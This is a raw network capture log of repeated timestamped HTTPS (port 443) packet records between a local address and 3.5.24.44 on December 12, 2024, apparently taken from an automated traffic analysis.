                                                                                                                                                    Dec 12, 2024 18:02:07.175843000 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.175899029 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.182940960 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.182971954 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.183099985 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.183108091 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.183249950 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.190767050 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.190798998 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.190850973 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.190857887 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.190903902 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.198843002 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.198873997 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.198914051 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.198919058 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.198957920 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.206207991 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.206233978 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.206284046 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.206290007 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.206331968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.214411020 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.214436054 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.214488983 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.214512110 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.214523077 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.214572906 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.221609116 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.221626043 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.221681118 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.221693993 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.221746922 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.229605913 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.229624987 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.229697943 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.229722023 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.229767084 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.368156910 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.368189096 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.368248940 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.368273020 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.368290901 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.368313074 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.375189066 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.375211000 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.375255108 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.375272989 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.375287056 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.375318050 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.383083105 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.383099079 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.383166075 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.383191109 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.383270025 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.391323090 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.391338110 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.391417027 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.391432047 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.391475916 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.398252964 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.398267984 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.398323059 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.398334026 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.398379087 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.406673908 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.406692028 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.406749964 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.406763077 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.406801939 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.413927078 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.413953066 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.414005041 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.414015055 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.414041042 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.414052963 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.422008991 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.422040939 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.422113895 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.422127962 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.422174931 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.560626984 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.560656071 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.560755014 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.560785055 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.560825109 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.567606926 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.567630053 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.567689896 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.567701101 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.567727089 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.567744017 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.575685024 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.575716972 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.575778008 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.575789928 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.575845003 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.583462954 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.583484888 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.583534002 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.583544016 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.583570957 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.583587885 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.590687990 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.590703964 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.590768099 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.590778112 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.590814114 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.600126982 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.600145102 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.600241899 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.600269079 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.600286007 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.600311041 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.606318951 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.606337070 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.606420994 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.606430054 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.606468916 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.614372969 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.614397049 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.614458084 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.614466906 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.614504099 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.752546072 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.752573967 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.752636909 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.752650023 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.752671003 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.752691984 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.759723902 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.759742975 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.759793997 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.759802103 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.759855986 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.768059015 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.768080950 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.768151045 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.768161058 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.768194914 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.775661945 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.775681973 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.775746107 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.775755882 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.775806904 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.783737898 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.783760071 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.783843994 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.783852100 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.783888102 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.791363955 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.791385889 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.791444063 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.791451931 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.791497946 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.798612118 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.798638105 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.798724890 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.798732042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.798768997 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.806637049 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.806652069 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.806716919 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.806723118 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.806757927 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.945089102 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.945121050 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.945166111 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.945187092 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.945199966 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.946050882 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.952306986 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.952332973 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.952390909 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.952428102 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.952450037 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.952486038 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.960366964 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.960390091 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.960448027 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.960455894 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.960508108 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.968210936 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.968230963 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.968281984 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.968288898 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.968343019 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.975449085 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.975471973 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.975512981 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.975519896 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.975552082 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.975569963 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.983550072 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.983570099 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.983630896 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.983642101 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.983683109 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.991000891 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.991023064 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.991111040 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.991121054 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.991162062 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.999089956 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.999118090 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.999172926 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.999181986 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.999202013 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.999223948 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.137428999 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.137455940 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.137639046 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.137672901 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.137938976 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.145613909 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.145631075 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.145713091 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.145725012 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.145765066 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.152599096 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.152614117 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.152683020 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.152690887 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.152730942 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.160484076 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.160499096 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.160561085 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.160568953 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.160619020 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.168551922 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.168566942 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.168628931 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.168642044 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.168706894 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.175776958 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.175791979 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.175853968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.175860882 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.175899982 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.184149981 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.184186935 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.184256077 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.184272051 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.184304953 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.191396952 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.191414118 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.191488028 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.191504002 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.191939116 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.329706907 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.329735041 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.329834938 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.329854012 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.329920053 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.337807894 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.337826014 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.337889910 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.337899923 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.337948084 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.345016003 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.345033884 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.345108986 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.345118046 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.345163107 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.353106022 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.353126049 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.353226900 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.353238106 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.353276014 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.360908031 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.360927105 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.361061096 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.361069918 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.361140966 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.368365049 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.368381023 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.368448973 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.368457079 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.368499041 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.376555920 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.376574039 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.376636982 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.376646042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.376686096 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.384073019 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.384104013 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.384170055 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.384181976 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.384289026 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.522384882 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.522473097 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.522484064 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.522505045 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.522553921 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.530426979 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.530447960 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.530538082 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.530550957 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.530600071 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.537616968 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.537636042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.537708044 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.537718058 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.537760019 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.545578003 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.545598984 CET443497603.5.24.44192.168.2.5
